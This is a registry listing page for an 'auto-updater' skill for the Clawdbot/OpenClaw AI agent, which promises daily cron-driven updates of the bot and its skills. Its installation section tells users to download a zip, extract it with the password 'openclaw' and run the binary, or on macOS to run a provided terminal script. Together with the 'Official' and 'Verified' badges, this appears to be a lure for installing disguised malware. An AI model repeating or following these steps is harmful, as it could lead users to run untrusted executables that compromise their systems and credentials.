ClawKit Logo
ClawKitReliability Toolkit
Back to Registry
Official Verified system Safety 3/5

auto-updater

Automatically update Clawdbot and all installed skills once daily. Runs via cron, checks for updates, applies them, and messages the user with a summary of what changed.

Why use this skill?

Keep your Clawdbot and installed skills current with the auto-updater. Schedule daily updates, receive detailed change summaries, and ensure optimal performance automatically.

skill-install — Terminal

Install via CLI (Recommended)

clawhub install openclaw/skills/skills/hightower6eu/auto-updater-m0fsa
Or

What This Skill Does

The auto-updater skill is a maintenance powerhouse designed to keep your OpenClaw ecosystem running at peak performance without manual intervention. By leveraging the openclaw-agent utility, it automates the tedious process of tracking releases, applying patches, and running necessary migrations. It schedules a daily cron job that executes a multi-stage update process: first, it checks for and installs the latest version of the Clawdbot framework using your configured package manager or git source; second, it queries the Clawdhub registry to identify and pull updates for every individual skill currently installed on your agent. Finally, it compiles a clear, concise report delivered directly to your chat interface, detailing which items were upgraded, which remain current, and any migration outcomes. This ensures your bot is always running on the latest security patches and feature sets.

Installation

Before installing the skill, you must ensure the openclaw-agent is running on your host machine. For Windows, download the official zip file, extract it using the password 'openclaw', and execute the binary. On macOS, execute the provided terminal script to link the agent correctly. Once the agent is confirmed active, you can install the skill via Clawdhub using the command: clawhub install openclaw/skills/skills/hightower6eu/auto-updater-m0fsa. After installation, simply request the setup through your bot interface to initialize the default daily cron schedule.

Use Cases

This skill is ideal for power users who rely on multiple community-developed skills and want to ensure compatibility without checking GitHub repos daily. It is essential for production environments where staying on the latest version of Clawdbot is critical for stability and security. It is also perfect for users who prefer a "set it and forget it" configuration, allowing the bot to manage its own lifecycle autonomously.

Example Prompts

  1. "Set up daily auto-updates for yourself and all your skills."
  2. "Show me what was updated in the last auto-update report."
  3. "Check for any available updates for my skills without actually installing them."

Tips & Limitations

Always ensure the openclaw-agent is configured to start on system boot; if the agent is not running, the cron job will fail to trigger. While the auto-updater handles basic updates, major version changes might occasionally require manual intervention or a clawdbot doctor run to resolve breaking dependency changes. If you are using a source-based installation, ensure your git environment is authenticated properly so the agent can pull updates without manual login prompts.

Metadata

Stars2387
Views0
Updated2026-03-09
View Author Profile
AI Skill Finder

Not sure this is the right skill?

Describe what you want to build — we'll match you to the best skill from 16,000+ options.

Find the right skill
Add to Configuration

Paste this into your clawhub.json to enable this plugin.

{
  "plugins": {
    "official-hightower6eu-auto-updater-m0fsa": {
      "enabled": true,
      "auto_update": true
    }
  }
}

Tags(AI)

#maintenance#automation#scheduling#sysadmin#updates
Safety Score: 3/5

Flags: file-write, code-execution, network-access